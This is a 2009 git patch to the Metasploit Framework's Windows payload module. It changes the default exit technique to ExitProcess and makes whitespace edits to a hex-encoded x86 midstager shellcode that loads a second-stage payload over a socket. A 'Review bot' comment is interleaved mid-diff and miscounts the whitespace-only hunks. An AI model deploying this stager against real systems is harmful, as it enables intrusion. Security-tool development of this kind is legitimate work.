From 111d49135e31e4f469e765bd86a8f361b002fa57 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 21 Dec 2009 20:44:44 +0000
Subject: [PATCH] Fixes #609. Revert back to ExitProcess(0) as default, this resolves a number of small bugs
git-svn-id: file:///home/svn/framework3/trunk@7935 4d416f70-5f16-0410-b530-b9f4589650da
---
 lib/msf/core/payload/windows.rb | 37 +++++++++++++++++----------------
 1 file changed, 19 insertions(+), 18 deletions(-)
diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb
index 0585369ae5..5610e5ffec 100644
--- a/lib/msf/core/payload/windows.rb
+++ b/lib/msf/core/payload/windows.rb
@@ -10,10 +10,10 @@ require 'msf/core' ### module Msf::Payload::Windows - # + # # ROR hash associations for some of the exit technique routines. # - @@exit_types = + @@exit_types = { 'seh' => 0xEA320EFE, # SetUnhandledExceptionFilter 'thread' => 0x0A2A1DE0, # ExitThread
@@ -42,14 +42,14 @@ module Msf::Payload::Windows end merge_info( info, 'SaveRegisters' => [ 'esp' ] ) end - + #if (info['Alias']) # info['Alias'] = 'windows/' + info['Alias'] #end register_options( [ - Msf::OptRaw.new('EXITFUNC', [ true, "Exit technique: #{@@exit_types.keys.join(", ")}", 'thread' ]) + Msf::OptRaw.new('EXITFUNC', [ true, "Exit technique: #{@@exit_types.keys.join(", ")}", 'process' ]) ], Msf::Payload::Windows ) ret
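Review bot: The `EXITFUNC` option in the second hunk (`@@ -42,14`) now defaults to `'process'`, but neither the description string nor a comment records why, so the next reader has only the commit message to explain the reversal; a one-line comment above the `Msf::OptRaw.new('EXITFUNC', ...)` line such as `# Default is 'process' (ExitProcess); the 'thread' default was reverted in #609` would keep that with the code. Because `OptRaw` accepts any string, a mistyped technique name is not rejected when the option is set and would presumably only surface later when `@@exit_types` is consulted; if this tree already has `Msf::OptEnum`, `Msf::OptEnum.new('EXITFUNC', [ true, 'Exit technique', 'process', @@exit_types.keys ])` would validate against the known keys while keeping the same default. The first hunk (`@@ -10,10`) and the three that follow are whitespace-only. The enclosing method starts before and ends after this hunk.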
@@ -92,19 +92,19 @@ module Msf::Payload::Windows
 # out of stack space or NX problems.
 # See the source file: /external/source/shellcode/windows/midstager.asm
 midstager =
- "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" +
- "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" +
- "\xff\xff\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c" +
- "\x01\xe9\x8b\x71\x3c\x01\xee\x60\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b" +
- "\x5b\x14\x8b\x73\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c" +
- "\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a" +
- "\x8b\x6b\x10\x8b\x1b\x75\xdb\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef" +
- "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0" +
- "\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x81\xfa\x54" +
- "\xca\xaf\x91\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f" +
- "\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x08\x61\x89\xe3\x6a" +
- "\x00\x6a\x04\x53\x57\xff\xd6\x8b\x1b\x6a\x40\x68\x00\x30\x00\x00" +
- "\x53\x6a\x00\xff\xd5\x89\xc5\x55\x6a\x00\x53\x55\x57\xff\xd6\x01" +
+ "\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b\x12\x8b" +
+ "\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32\x0f\x85\xeb\xff" +
+ "\xff\xff\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c\x0d\x1c" +
+ "\x01\xe9\x8b\x71\x3c\x01\xee\x60\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b" +
+ "\x5b\x14\x8b\x73\x28\x6a\x18\x59\x31\xff\x31\xc0\xac\x3c\x61\x7c" +
+ "\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a" +
+ "\x8b\x6b\x10\x8b\x1b\x75\xdb\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef" +
+ "\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0" +
+ "\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x81\xfa\x54" +
+ "\xca\xaf\x91\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f" +
+ "\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x08\x61\x89\xe3\x6a" +
+ "\x00\x6a\x04\x53\x57\xff\xd6\x8b\x1b\x6a\x40\x68\x00\x30\x00\x00" +
+ "\x53\x6a\x00\xff\xd5\x89\xc5\x55\x6a\x00\x53\x55\x57\xff\xd6\x01" +
 "\xc5\x29\xc3\x85\xdb\x75\xf1\xc3"
 
 # Prepend the stage prefix as necessary, such as a tag that is needed to
@@ -120,7 +120,7 @@ module Msf::Payload::Windows
 # midstage so that we don't accidentally read in part of the second
 # stage.
 Rex::ThreadSafe.sleep(1.5)
-
+
 # The mid-stage requires that we transmit a four byte length field that
 # it will use as the length of the subsequent stage.
 conn.put([ payload.length ].pack('V'))
@@ -129,3 +129,4 @@ module Msf::Payload::Windows end end +